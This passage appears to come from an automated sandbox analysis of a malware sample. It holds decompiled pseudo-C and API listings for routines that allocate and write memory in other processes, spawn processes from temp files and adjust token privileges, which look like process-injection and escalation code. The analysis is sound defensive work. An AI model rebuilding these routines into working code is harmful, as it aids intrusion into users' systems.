                          					 *(_t103 + 0x60) = _t73;
                          					 *(_t103 + 0x5c) = 0;
                          					E006EC400(_t98, _t87, 2 - _t101);
                          					_t103 = _t103 + 0xc;
                          					_t81 = _t77 - _t101 + 0x6c;
                          					__eflags = _t81;
                          					_t60 = _t81;
                          					 *(_t103 + 0x68) = _t81;
                          					goto L9;
                          				}
                          			}

                          0x006e43e0
                          0x006e43ea
                          0x006e43ec
                          0x006e43f7
                          0x006e43fc
                          0x006e4401
                          0x006e4402
                          0x006e440d
                          0x006e45f0
                          0x006e45f0
                          0x006e45f6
                          0x006e45f9
                          0x006e45f9
                          0x006e45ff
                          0x006e4605
                          0x006e4608
                          0x006e4608
                          0x006e460e
                          0x006e4613
                          0x006e4616
                          0x006e461b
                          0x006e461b
                          0x006e462c
                          0x006e441e
                          0x006e4425
                          0x006e4429
                          0x006e4430
                          0x006e4438
                          0x006e45bc
                          0x006e45ce
                          0x006e45d6
                          0x006e45db
                          0x006e45e9
                          0x006e45dd
                          0x006e45e0
                          0x006e45e3
                          0x006e45e3
                          0x00000000
                          0x006e45db
                          0x006e443e
                          0x006e4444
                          0x006e4448
                          0x006e444a
                          0x006e444f
                          0x006e4452
                          0x006e44a7
                          0x006e44a7
                          0x006e44ad
                          0x006e44b2
                          0x006e44b5
                          0x006e44bb
                          0x006e44bf
                          0x006e4514
                          0x006e4514
                          0x006e451c
                          0x006e4520
                          0x006e452b
                          0x006e4530
                          0x006e4535
                          0x006e4539
                          0x006e4597
                          0x006e4597
                          0x006e45a4
                          0x006e45ac
                          0x006e45b1
                          0x006e45b6
                          0x00000000
                          0x006e45b6
                          0x006e453b
                          0x006e4540
                          0x006e4542
                          0x006e4549
                          0x006e454a
                          0x006e4550
                          0x00000000
                          0x00000000
                          0x006e4552
                          0x006e455a
                          0x006e458e
                          0x006e458f
                          0x006e4594
                          0x00000000
                          0x006e4594
                          0x006e4566
                          0x006e456a
                          0x006e4578
                          0x006e457d
                          0x006e4584
                          0x006e458a
                          0x006e458a
                          0x006e458a
                          0x00000000
                          0x006e458a
                          0x006e44c1
                          0x006e44c6
                          0x006e44c8
                          0x006e44cf
                          0x006e44d0
                          0x006e44d9
                          0x00000000
                          0x00000000
                          0x006e44db
                          0x006e44e3
                          0x00000000
                          0x006e44e3
                          0x006e44ef
                          0x006e44f3
                          0x006e44fe
                          0x006e4503
                          0x006e450c
                          0x006e450c
                          0x006e4510
                          0x00000000
                          0x006e4510
                          0x006e4454
                          0x006e4456
                          0x006e4458
                          0x006e445f
                          0x006e4460
                          0x006e4468
                          0x00000000
                          0x00000000
                          0x006e446a
                          0x006e4472
                          0x006e447a
                          0x00000000
                          0x006e447a
                          0x006e447e
                          0x006e4487
                          0x006e4494
                          0x006e4499
                          0x006e449e
                          0x006e449e
                          0x006e44a1
                          0x006e44a3
                          0x00000000
                          0x006e44a3

                          APIs
                          • GetStartupInfoW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 006E4430
                          • SetEnvironmentVariableW.KERNEL32(?,?,?,?,00000000), ref: 006E45B6
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E45CE
                          • CloseHandle.KERNEL32(?), ref: 006E45F9
                          • CloseHandle.KERNEL32(?), ref: 006E4608
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$CreateEnvironmentInfoProcessStartupVariable
                          • String ID: W$xd0
                          • API String ID: 2864332936-518749000
                          • Opcode ID: 69a37f92cbffe887a727614f1752c02917a60831bdc5218c79d244e0cf416bea
                          • Instruction ID: be41641659ffa96e0b856027cb6fc11877e8dedb17a68318a57dbb51f732d695
                          • Opcode Fuzzy Hash: 69a37f92cbffe887a727614f1752c02917a60831bdc5218c79d244e0cf416bea
                          • Instruction Fuzzy Hash: A2519AB0A093819BD7108F2ADC49B2BBBEAEF80314F14452CF495873A1EB75D805CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E006EC110(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                          				char _v20;
                          				long _v24;
                          				void* _v28;
                          				void* _v32;
                          				void* _v36;
                          				void* _t47;
                          				void* _t50;
                          				void* _t51;
                          				void* _t52;
                          				void* _t66;
                          				signed int _t67;
                          				void* _t70;
                          				intOrPtr _t73;
                          				void* _t74;
                          				void* _t76;
                          				DWORD* _t77;
                          				DWORD* _t80;
                          				intOrPtr _t83;
                          				void* _t84;
                          				void* _t85;
                          				intOrPtr _t86;
                          				void* _t87;
                          				void* _t89;
                          				long* _t90;
                          				long* _t91;
                          
                          				_t90 =  &_v24;
                          				 *_t90 = 0;
                          				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
                          					L44:
                          					return 0;
                          				}
                          				_t88 = _a8;
                          				_t73 = _a12;
                          				_t87 = __ecx;
                          				if(_a8 != 0 || _t73 == 0) {
                          					_t83 = _a4;
                          					_t47 = 0;
                          					_v36 = 0;
                          					if(_t83 == 0) {
                          						L5:
                          						_v28 = _t47;
                          						if(_t73 == 0) {
                          							L7:
                          							_t84 = _a16;
                          							_t76 = 0;
                          							_t89 = 0;
                          							if(_t84 == 0) {
                          								L9:
                          								_t48 = _a20;
                          								if(_a20 == 0) {
                          									L19:
                          									_push(0);
                          									_push( *((intOrPtr*)(_t87 + 0x94)));
                          									_push( *((intOrPtr*)(_t87 + 0x9c)));
                          									_v32 = _t76;
                          									_push(_t76);
                          									_push(_t89);
                          									_push(_t73);
                          									_push(_v36);
                          									_push(_v28);
                          									_push(_t90);
                          									_push(8);
                          									_push( *((intOrPtr*)(_t87 + 0xa0)));
                          									_push(_t87);
                          									_t50 = E006F3FA0();
                          									_t91 =  &(_t90[0xc]);
                          									if(_t50 == 0) {
                          										_t74 = _t84;
                          										L31:
                          										_t51 = _v32;
                          										if(_t51 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _t51, 0, 0x8000);
                          										}
                          										_t84 = _t74;
                          										L34:
                          										if(_t89 != 0) {
                          											_t77 =  &_v20;
                          											 *_t77 = 0;
                          											if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t77) == 0 || _v20 != 0x400) {
                          												 *_t91 = 0;
                          											}
                          											VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
                          										}
                          										L39:
                          										if(_v36 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _v36, 0, 0x8000);
                          										}
                          										L41:
                          										_t52 = _v28;
                          										if(_t52 != 0) {
                          											VirtualFreeEx( *(_t87 + 0x70), _t52, 0, 0x8000);
                          										}
                          										L43:
                          										return  *_t91;
                          									}
                          									 *(_t87 + 0x44) =  *_t91;
                          									if(_t89 != 0) {
                          										_t80 =  &_v24;
                          										 *_t80 = 0;
                          										if(ReadProcessMemory( *(_t87 + 0x70), _t89, _t84, 0x400, _t80) == 0 || _v24 != 0x400) {
                          											 *_t91 = 0;
                          										}
                          										VirtualFreeEx( *(_t87 + 0x70), _t89, 0, 0x8000);
                          									}
                          									_t74 = _t84;
                          									_t85 = 0;
                          									while(1) {
                          										_push(1);
                          										if(E006F5020(_t87, 0) != 0) {
                          											break;
                          										}
                          										_t85 = _t85 + 1;
                          										if(_t85 < 2) {
                          											continue;
                          										}
                          										_t89 = 0;
                          										_t115 = _t85 - 2;
                          										if(_t85 == 2) {
                          											goto L31;
                          										}
                          										break;
                          									}
                          									E006E76A0(_t87, _t115);
                          									_t89 = 0;
                          									goto L31;
                          								}
                          								_t66 = E006E9CD0(_t48,  *(_t87 + 0x70), _t48, 0x184);
                          								_t91 =  &(_t90[3]);
                          								if(_t66 == 0) {
                          									goto L34;
                          								}
                          								_t76 = _t66;
                          								_t86 =  *((intOrPtr*)(_a20 + 0x180));
                          								if(_t86 == 0) {
                          									L18:
                          									_t84 = _a16;
                          									goto L19;
                          								} else {
                          									_t67 = 0;
                          									L13:
                          									L13:
                          									if( *((short*)(_t86 + _t67 * 2)) == 0) {
                          										__eflags = _t67;
                          										if(_t67 != 0) {
                          											_v32 = _t76;
                          											 *((intOrPtr*)(_a20 + 0x180)) = E006E9CD0(_t67,  *(_t87 + 0x70), _t86, _t67);
                          											E006E91E0(_t86);
                          											_t76 = _v32;
                          											_t90 =  &(_t91[4]);
                          										}
                          									} else {
                          										goto L14;
                          									}
                          									goto L18;
                          									L14:
                          									_t67 = _t67 + 1;
                          									if(_t67 != 0x7fffffff) {
                          										goto L13;
                          									} else {
                          										goto L18;
                          									}
                          								}
                          							}
                          							_t70 = E006E9CD0(_t47,  *(_t87 + 0x70), _t84, 0x400);
                          							_t76 = 0;
                          							_t91 =  &(_t90[3]);
                          							_t89 = _t70;
                          							if(_t70 == 0) {
                          								goto L39;
                          							}
                          							goto L9;
                          						}
                          						_t47 = E006E9CD0(_t47,  *(_t87 + 0x70), _t88, _t73);
                          						_t91 =  &(_t90[3]);
                          						_v36 = _t47;
                          						if(_t47 == 0) {
                          							goto L41;
                          						}
                          						goto L7;
                          					}
                          					_t47 = E006E9CD0( *0x6f9d28(_t83) + 1,  *(_t87 + 0x70), _t83, 0);
                          					_t91 =  &(_t90[3]);
                          					if(0 == 0) {
                          						goto L43;
                          					}
                          					goto L5;
                          				} else {
                          					goto L44;
                          				}
                          			}

                          0x006ec114
                          0x006ec119
                          0x006ec122
                          0x006ec37c

                          APIs
                          • lstrlen.KERNEL32(?), ref: 006EC154
                          • ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 006EC286
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC2AC
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC2F0
                          • ReadProcessMemory.KERNEL32(?,?,?,00000400,?), ref: 006EC312
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC338
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC353
                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006EC36C
                            • Part of subcall function 006E9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
                            • Part of subcall function 006E9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: FreeVirtual$MemoryProcess$Read$AllocHeapWritelstrlen
                          • String ID:
                          • API String ID: 2758599655-0
                          • Opcode ID: de2d9734ee1c0621cd4ea45cad07cda12ec54cd9ed0f6b65fd52bfda37b64764
                          • Instruction ID: 8fd269882a125700c6bc48b54ee80bb6c8defd53caff82a925a2b98b5ed2b33e
                          • Opcode Fuzzy Hash: de2d9734ee1c0621cd4ea45cad07cda12ec54cd9ed0f6b65fd52bfda37b64764
                          • Instruction Fuzzy Hash: 2E61D470605741AFE7215F66CC09BABB7EAFF80714F14482CFA91963A0DB71E802DB65
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E006E5150(void* __ecx, void* __eflags) {
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				void* _t29;
                          				void* _t30;
                          				WCHAR* _t36;
                          				void* _t37;
                          				int _t38;
                          				intOrPtr _t39;
                          				WCHAR* _t44;
                          				struct _PROCESS_INFORMATION* _t46;
                          				struct _STARTUPINFOW* _t52;
                          				void* _t53;
                          				WCHAR* _t57;
                          				struct _STARTUPINFOW* _t58;
                          				LPWSTR* _t59;
                          				WCHAR** _t60;
                          				intOrPtr _t62;
                          
                          				_t47 = __ecx;
                          				_t53 = __ecx;
                          				_t52 = _t58;
                          				E006F6610(_t52, 0, 0x530);
                          				_t59 =  &(_t58->lpTitle);
                          				_t62 =  *0x6f9ae8; // 0x1
                          				if(_t62 == 0) {
                          					return E006E43E0(_t53, __eflags, 0);
                          				}
                          				E006E8CD0(_t47);
                          				_t60 =  &(_t59[1]);
                          				_t44 =  &(_t60[0x1a]);
                          				 *_t44 = 0;
                          				 *(_t44 - 0xc) = _t44;
                          				_t26 =  *0x6f9de4(0, 0x1c,  *((intOrPtr*)(_t44 - 0x10)), 0, _t44,  &(_t59[0x16]));
                          				_t63 = _t26;
                          				 *((intOrPtr*)(_t44 - 8)) = _t26;
                          				if(_t26 < 0) {
                          					_t60[0x17] = 0;
                          					_t27 = 0;
                          					__eflags = 0;
                          				} else {
                          					_t57 =  &(_t60[0x11a]);
                          					E006F4520(_t57, 0x78);
                          					_t60 =  &(_t60[2]);
                          					GetTempFileNameW(_t44, _t57, 0, _t44);
                          					_t27 =  *((intOrPtr*)(_t57 - 0x40c));
                          				}
                          				_push(0);
                          				_push(0);
                          				if(E006EFA90(_t53, _t63, _t27,  &(_t60[0x15]), 0) == 0) {
                          					L11:
                          					_t29 = _t60[0x11];
                          					if(_t29 != 0) {
                          						CloseHandle(_t29);
                          					}
                          					_t30 = _t60[0x12];
                          					if(_t30 != 0) {
                          						CloseHandle(_t30);
                          					}
                          					_t31 = _t60[0x15];
                          					if(_t60[0x15] != 0) {
                          						E006E91E0(_t31);
                          						_t60 =  &(_t60[1]);
                          					}
                          					return _t60[0x19];
                          				} else {
                          					_t36 = _t60[0x15];
                          					if(_t36 == 0) {
                          						goto L11;
                          					}
                          					_t46 =  &(_t60[0x11]);
                          					_push(0);
                          					_push(0);
                          					_push(0x420);
                          					_push(_t36);
                          					_push( &(_t60[0x12]));
                          					_t37 = E006E5470(_t46);
                          					_t60 =  &(_t60[6]);
                          					if(_t37 == 0) {
                          						 *_t60 = 0x44;
                          						GetStartupInfoW(_t52);
                          						_t38 = CreateProcessW(_t60[0x1e], 0, 0, 0, 0, 0, 0, 0, _t52, _t46);
                          						__eflags = _t38;
                          						if(_t38 == 0) {
                          							_t39 =  *0x6f9b0c; // 0x2ef350
                          							 *((intOrPtr*)(_t39 + 8)) = 7;
                          							goto L11;
                          						}
                          						L10:
                          						_t60[0x19] = 1;
                          						goto L11;
                          					}
                          					CloseHandle(_t60[0x11]);
                          					CloseHandle(_t60[0x12]);
                          					goto L10;
                          				}
			}

                          APIs
                            • Part of subcall function 006E8CD0: GetCurrentProcess.KERNEL32 ref: 006E8D0D
                            • Part of subcall function 006E8CD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 006E8D19
                            • Part of subcall function 006E8CD0: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8D3A
                            • Part of subcall function 006E8CD0: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 006E8D68
                            • Part of subcall function 006E8CD0: RevertToSelf.ADVAPI32 ref: 006E8DD9
                          • SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 006E5198
                          • GetTempFileNameW.KERNEL32(?,?,00000000,?), ref: 006E51BC
                          • CloseHandle.KERNEL32(?), ref: 006E522A
                          • CloseHandle.KERNEL32(?), ref: 006E5230
                          • GetStartupInfoW.KERNEL32 ref: 006E523C
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006E524F
                          • CloseHandle.KERNEL32(?), ref: 006E526A
                          • CloseHandle.KERNEL32(?), ref: 006E5279
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$Process$Token$AdjustCreateCurrentFileFolderInfoLookupNameOpenPathPrivilegePrivilegesRevertSelfStartupTempValue
                          • String ID:
                          • API String ID: 2859521768-0
                          • Opcode ID: f93b5c1f5aee8d95867b3b6021072cb84f55600d0fd4c33a38b502a2ddee4c00
                          • Instruction ID: e0a52c434b9bfd6823706ca66b59071ebd28b66c4fdcef8bb3b55fba3d447b91
                          • Opcode Fuzzy Hash: f93b5c1f5aee8d95867b3b6021072cb84f55600d0fd4c33a38b502a2ddee4c00
                          • Instruction Fuzzy Hash: 73319271605344AFE7109B62DC89F6B7BEEEF81788F044419FA0686291EB75ED04CB72
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006ECE40(long _a4) {
                          				WCHAR* _v0;
                          				short _v536;
                          				union _SID_NAME_USE _v540;
                          				char _v544;
                          				WCHAR* _v548;
                          				void* _v552;
                          				void* _t16;
                          				void* _t20;
                          				void* _t25;
                          				DWORD* _t28;
                          				long _t29;
                          				DWORD* _t30;
                          				DWORD* _t34;
                          				long _t35;
                          				void* _t36;
                          				void* _t37;
                          				HANDLE* _t39;
                          
                          				_t35 = 0;
                          				_v548 = 0;
                          				_t16 = OpenProcess(0x400, 0, _a4);
                          				if(_t16 == 0) {
                          					L13:
                          					return _t35;
                          				}
                          				_t37 = _t16;
                          				if(OpenProcessToken(_t37, 8, _t39) == 0) {
                          					L9:
                          					_t35 = 0;
                          					L10:
                          					_t20 = _v548;
                          					if(_t20 != 0) {
                          						CloseHandle(_t20);
                          					}
                          					CloseHandle(_t37);
                          					goto L13;
                          				}
                          				_t36 = 0;
                          				_t30 =  &_v544;
                          				 *_t30 = 0;
                          				if(GetTokenInformation(_v548, 1, 0, 0, _t30) == 0) {
                          					if(GetLastError() != 0x7a) {
                          						goto L9;
                          					}
                          					_t25 = E006E3180(_v548, 0);
                          					if(_t25 == 0) {
                          						goto L9;
                          					}
                          					_t36 = _t25;
                          				}
                          				if(GetTokenInformation(_v552, 1, _t36, _v548, _t30) == 0) {
                          					goto L9;
                          				}
                          				_t34 =  &_v548;
                          				_v0 = 0;
                          				 *_t34 = _a4;
                          				_t28 =  &_v544;
                          				 *_t28 = 0x100;
                          				 *_v0 = 0;
                          				_t29 = LookupAccountSidW(0,  *_t36, _v0, _t34,  &_v536, _t28,  &_v540);
                          				_t35 = _t29;
                          				if(_t29 != 0) {
                          					_t35 = _v548;
                          				}
                          				goto L10;
			}

                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,?), ref: 006ECE5D
                          • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006ECE73
                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 006ECE92
                          • GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,?,?), ref: 006ECEA8
                          • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 006ECEED
                          • GetLastError.KERNEL32 ref: 006ECEFF
                          • CloseHandle.KERNEL32(00000000), ref: 006ECF2D
                          • CloseHandle.KERNEL32(00000000), ref: 006ECF34
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
• Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
• Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Token$CloseHandleInformationOpenProcess$AccountErrorLastLookup
                          • String ID:
                          • API String ID: 2338897050-0
                          • Opcode ID: c12616dacac91650ae6625dbe18ceacda9968700880066819307f5ef1f13030d
                          • Instruction ID: dce9d890ddabb7e06413acf9577a441f6b72a8fcb193682a7ab86e5b4812530c
                          • Opcode Fuzzy Hash: c12616dacac91650ae6625dbe18ceacda9968700880066819307f5ef1f13030d
                          • Instruction Fuzzy Hash: 87314971205382ABD7219F66EC88FABBBEEEFC4754F004418F445C6290DB709806CA32
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E006F7560(intOrPtr* __ecx) {
                          				intOrPtr _t33;
                          				WCHAR** _t34;
                          				void* _t38;
                          				WCHAR** _t44;
                          				WCHAR** _t45;
                          				void* _t46;
                          				void* _t48;
                          				WCHAR** _t54;
                          				WCHAR** _t62;
                          				WCHAR* _t64;
                          				WCHAR** _t69;
                          				WCHAR** _t72;
                          				intOrPtr* _t73;
                          				signed int _t94;
                          				WCHAR** _t97;
                          				void* _t98;
                          				WCHAR** _t99;
                          				intOrPtr* _t100;
                          				void* _t103;
                          				intOrPtr _t104;
                          				void* _t105;
                          				WCHAR*** _t106;
                          
                          				_t100 = __ecx;
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x34)))));
                          				_t33 = E006EC720();
                          				 *((intOrPtr*)(_t105 + 0xc)) = _t33;
                          				if(_t33 == 0) {
                          					return _t33;
                          				}
                          				_t34 = E006E5140(0x10);
                          				_t106 = _t105 + 4;
                          				_t72 = _t34;
                          				E006E91B0(_t34, 8);
                          				_t94 = 0;
                          				_t106[6] = 0;
                          				 *0x6f9d54(0x6f9bbc);
                          				if( *_t100 == 0) {
                          					L7:
                          					 *0x6f9d9c(0x6f9bbc);
                          					_t38 = E006EC430(_t72);
                          					_t102 = _t106[0xc];
                          					if(_t38 >= E006EC430(_t106[0xc]) || E006EC430(_t102) == 0) {
                          						L29:
                          						E006E91E0(_t106[3]);
                          						E006E1EA0(_t72);
                          						return L006F7400(_t72);
                          					} else {
                          						_t44 = 0;
                          						_t106[2] = _t72;
                          						do {
                          							_t106[4] = _t44;
                          							_t45 = E006E42F0(_t102, _t44);
                          							 *_t106 = _t45;
                          							if(_t45 != 0 &&  *( *_t106) != 0) {
                          								_t48 = E006EC430(_t72);
                          								_t98 = 0;
                          								if(_t48 == 0) {
                          									L17:
                          									if(_t98 != E006EC430(_t72)) {
                          										goto L28;
                          									}
                          									_t16 = _t100 + 0x14; // 0x2fa260
                          									if(E006EC430( *_t16) == 0) {
                          										L27:
                          										E006E9260(_t100, _t133, _t106[1], _t106[0xd]);
                          										Sleep(0x1388);
                          										goto L28;
                          									}
                          									_t103 = 0;
                          									_t106[1] = 1;
                          									do {
                          										_t18 = _t100 + 0x14; // 0x2fa260
                          										_t54 = E006E42F0( *_t18, _t103);
                          										if(_t54 != 0) {
                          											_t99 = _t54;
                          											_t73 = _t100;
                          											if(lstrcmpiW( *_t99,  *(_t106[0xd])) == 0 && lstrcmpiW(_t99[1],  *( *_t106)) == 0) {
                          												E006F4E70();
                          												_t89 =  <  ? 0 : _t106[1];
                          												_t106[1] =  <  ? 0 : _t106[1];
                          											}
                          											_t100 = _t73;
                          											_t72 = _t106[2];
                          										}
                          										_t25 = _t100 + 0x14; // 0x2fa260
                          										_t103 = _t103 + 1;
                          									} while (_t103 < E006EC430( *_t25));
                          									_t133 = _t106[1];
                          									_t102 = _t106[0xc];
                          									if(_t106[1] == 0) {
                          										goto L28;
                          									}
                          									goto L27;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t62 = E006E42F0(_t72, _t98);
                          									if(_t62 == 0) {
                          										goto L16;
                          									}
                          									_t64 =  *_t62;
                          									if(_t64 != 0 && lstrcmpiW( *(_t106[1]), _t64) == 0) {
                          										goto L17;
                          									}
                          									L16:
                          									_t98 = _t98 + 1;
                          								} while (_t98 < E006EC430(_t72));
                          								goto L17;
                          							}
                          							L28:
                          							_t97 =  &(_t106[4][0]);
                          							_t46 = E006EC430(_t102);
                          							_t44 = _t97;
                          						} while (_t97 < _t46);
                          						goto L29;
                          					}
                          				} else {
                          					goto L2;
                          				}
                          				do {
                          					L2:
                          					_t4 = _t100 + 4; // 0x0
                          					_t104 =  *((intOrPtr*)( *_t4 + _t94 * 4));
                          					if(_t104 != 0 && lstrcmpiW( *(_t104 + 8), _t106[3]) == 0) {
                          						_t69 =  *(_t104 + 0x1c);
                          						if(_t69 != 0) {
                          							_t106[5] = _t69;
                          							E006E1200(_t72,  &(_t106[5]));
                          						}
                          					}
                          					_t94 = _t94 + 1;
                          				} while (_t94 <  *_t100);
                          				goto L7;
                          			}

                          Instruction addresses for the C-code lines above, in order (0x00000000 = no mapped address):
                          0x006f756b 0x006f756d 0x006f756f 0x006f7576 0x006f757a 0x006f7761 0x006f7761 0x006f7582 0x006f7587 0x006f758a
                          0x006f7590 0x006f7595 0x006f7597 0x006f75a0 0x006f75a8 0x006f75e1 0x006f75e6 0x006f75ee 0x006f75f3 0x006f7602
                          0x006f773e 0x006f7742 0x006f774c 0x00000000 0x006f7617 0x006f7617 0x006f7619 0x006f761d 0x006f761f 0x006f7624
                          0x006f762b 0x006f762e 0x006f7642 0x006f7647 0x006f764b 0x006f767c 0x006f7685 0x00000000 0x00000000 0x006f768b
                          0x006f7695 0x006f770e 0x006f7718 0x006f7722 0x00000000 0x006f7722 0x006f7697 0x006f769c 0x006f76a0 0x006f76a0
                          0x006f76a4 0x006f76ab 0x006f76ad 0x006f76b3 0x006f76c3 0x006f76d3 0x006f76e9 0x006f76ec 0x006f76ec 0x006f76f0
                          0x006f76f2 0x006f76f2 0x006f76f6 0x006f76f9 0x006f76ff 0x006f7703 0x006f7708 0x006f770c 0x00000000 0x00000000
                          0x00000000 0x00000000 0x00000000 0x00000000 0x006f764d 0x006f764d 0x006f7650 0x006f7657 0x00000000 0x00000000
                          0x006f7659 0x006f765d 0x00000000 0x00000000 0x006f7670 0x006f7672 0x006f7678 0x00000000 0x006f764d 0x006f7728
                          0x006f772e 0x006f772f 0x006f7736 0x006f7736 0x00000000 0x006f761d 0x00000000 0x00000000 0x00000000 0x006f75aa
                          0x006f75aa 0x006f75aa 0x006f75ad 0x006f75b2 0x006f75c5 0x006f75ca 0x006f75cc 0x006f75d7 0x006f75d7 0x006f75ca
                          0x006f75dc 0x006f75dd 0x00000000

                          APIs
                          • RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F75A0
                          • lstrcmpiW.KERNEL32(00000000,?), ref: 006F75BB
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F75E6
                          • lstrcmpiW.KERNEL32(?,?,00000000,00000000), ref: 006F7666
                          • lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 006F76BF
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 006F76CD
                          • Sleep.KERNEL32(00001388,?,?,00000000), ref: 006F7722
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$CriticalSection$EnterLeaveSleep
                          • String ID:
                          • API String ID: 1272173129-0
                          • Opcode ID: 4970e4b4f764a9dd0c1ab9d5a77d711a4ab1725cfce9ec549902078f4665d8ff
                          • Instruction ID: 705d5eace111424004e5520d6ba12d8516fb858b105d9c4b539977b678d00849
                          • Opcode Fuzzy Hash: 4970e4b4f764a9dd0c1ab9d5a77d711a4ab1725cfce9ec549902078f4665d8ff
                          • Instruction Fuzzy Hash: 75514A702093499FDB51AF2AD855A7AB6E7AF84780F40042CFA99C7351EF30DC01CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E006F5020(void* __ecx, void* __eflags) {
                          				void* _t91;
                          				void* _t92;
                          				void* _t94;
                          				void* _t98;
                          				intOrPtr _t102;
                          				struct _SECURITY_ATTRIBUTES* _t103;
                          				WCHAR* _t113;
                          				void* _t124;
                          				intOrPtr _t125;
                          				void* _t127;
                          				LPWSTR* _t129;
                          				signed int _t131;
                          				signed int _t132;
                          				void* _t135;
                          				intOrPtr _t143;
                          				intOrPtr _t151;
                          				void* _t153;
                          				WCHAR* _t157;
                          				void* _t158;
                          				WCHAR* _t159;
                          				void* _t160;
                          				signed int _t162;
                          				intOrPtr* _t163;
                          				intOrPtr* _t164;
                          				void* _t165;
                          				void* _t166;
                          				void* _t167;
                          				void* _t168;
                          				void* _t169;
                          
                          				_t129 = 0;
                          				_t153 = __ecx;
                          				 *((intOrPtr*)(_t163 + 8)) = 0;
                          				 *_t163 = 0;
                          				 *((intOrPtr*)(_t163 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t163 + 4)) = 0;
                          				E006F30C0(_t163 + 0x1c);
                          				_t159 = _t163 + 0x22;
                          				E006F4520(_t159, 0x50);
                          				_t164 = _t163 + 8;
                          				_t155 = _t164 + 0x4fe;
